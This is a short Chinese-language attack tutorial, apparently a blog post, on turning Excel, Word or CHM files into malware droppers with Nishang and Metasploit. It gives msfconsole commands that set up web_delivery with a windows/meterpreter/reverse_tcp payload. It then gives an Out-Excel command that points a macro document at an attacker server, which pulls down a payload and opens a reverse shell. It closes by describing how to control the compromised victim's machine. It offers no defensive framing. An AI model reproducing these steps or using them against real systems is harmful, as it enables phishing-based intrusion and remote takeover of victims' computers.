组合技——chm玩耍

需要准备:

原理:

nishang生成带有攻击脚本的excel和word或者chm,利用宏或者chm中的漏洞创建进程获取kali服务器上的攻击脚本,并下载到本地执行,从而反弹回一个shell

直接利用nishang生成带访问攻击宏的Excel 或Word文档和chm文件

缺点: 只有启用宏的office才能攻击成功,chm因为调用cmd带弹窗。

步骤:

  1. 搭建msf环境
  • 在终端中启动msf框架依赖度的服务

    1
    2
    service postgresql start
    service metasploit start
  • 打开msf终端 ,配置攻击模块

    1
    2
    3
    4
    5
    6
    7
    8
    msfconsole
    use exploit/multi/script/web_delivery
    set target 2
    set payload windows/meterpreter/reverse_tcp
    set lhost 公网ip
    set lport 端口1
    set uripath /
    exploit

chm_play_1.png

如果kali在虚拟机里,记得将端口映射到宿主机。

2.nishang生成excel
将Client目录下的Out-Excel.ps1解压出来,用powershell执行

1
2
..\ Out-Excel.ps1
Out-Excel -PayloadURL https://192.168.187.140:8080/ -OutputFile D:\temp\test.xls

其中https://192.168.187.140:8080/是msf开启的服务地址,端口改为映射出来的端口。

nishang目录

Out-CHM.ps1 中关键代码

Out-Excel.ps1 中关键代码

具体怎么利用,chm可以利用easychm将其复制到相应的chm文件中,实现自己构造chm。

建立会话session之后,即可以调用meterpreter命令进行操纵肉鸡。